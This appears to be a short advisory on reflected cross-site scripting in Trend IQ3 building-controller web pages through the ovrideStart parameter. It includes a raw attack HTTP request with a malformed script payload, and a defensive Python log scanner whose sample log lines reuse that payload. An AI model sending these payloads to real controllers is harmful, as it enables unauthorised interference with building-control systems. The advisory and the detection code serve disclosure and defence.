IQ3 Trend LAN Controller – Multiple Reflected XSS

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw one and poked at it without authentication. By default you are given system guest access, which lets you see the status of components. Some of these pages allow cross-site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf"><alert>('DF')</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive


2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub pages in the format Z#(W).htm, one for each of the 10 zones. Each of these pages has a reflected XSS in the same parameter: "><alert>('DF')</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS
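As an added defender-side example (not code from the original post), the following Python scans web-server or proxy access logs for requests to the affected pages (K.htm, P.htm, S.htm and the Z#(W).htm zone pages) whose ovrideStart parameter carries HTML metacharacters after URL-decoding. It assumes common log format and that a legitimate ovrideStart value is a plain integer, as in the trailing ovrideStart=0 of the request above; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Pages the advisory names as reflecting ovrideStart: K.htm, P.htm, S.htm
# and the zone pages Z#(W).htm (e.g. /Z3(W).htm).
VULN_PAGE = re.compile(r"^/(K|P|S|Z\d+\(W\))\.htm$", re.IGNORECASE)
# Assumption: a legitimate ovrideStart value is a plain integer; anything
# containing HTML/JS metacharacters is treated as an injection attempt.
SAFE_VALUE = re.compile(r"^\d*$")
META = re.compile(r"[<>\"'&/]")

# Constructed sample log (common log format); the 2nd line reuses the
# payload from the advisory, URL-encoded as a browser would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2013:13:55:36 +0000] "GET /K.htm?ovrideStart=0 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2013:13:56:01 +0000] "GET /K.htm?ovrideStart=dfdfdf'
    '&ovrideStart=dfdfdf%22%3E%3Calert%3E(%27DF%27)%3C/script%3E&ovrideStart=0 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2013:13:57:12 +0000] "GET /Z3(W).htm'
    '?ovrideStart=%22%3E%3Calert%3E(%27DF%27)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2013:13:58:00 +0000] "GET /index.htm?ovrideStart=%3Cb%3E HTTP/1.1" 200 512',
]

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/\d\.\d"')


def suspicious_ovride_values(request_target):
    """Return the decoded ovrideStart values of a request-target that contain
    HTML metacharacters, or [] if the page is not affected or all values are clean."""
    parts = urlsplit(request_target)
    if not VULN_PAGE.match(unquote(parts.path)):
        return []
    hits = []
    # parse_qsl keeps every repeated ovrideStart and URL-decodes each value
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "ovridestart" and not SAFE_VALUE.match(value) and META.search(value):
            hits.append(value)
    return hits


def scan_access_log(lines):
    """Yield (client_ip, request_target, hits) for lines that look like
    reflected-XSS attempts against the ovrideStart parameter."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = suspicious_ovride_values(m.group(2))
        if hits:
            yield (m.group(1), m.group(2), hits)


if __name__ == "__main__":
    for ip, target, hits in scan_access_log(SAMPLE_LOG):
        print(ip, target, hits)
```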

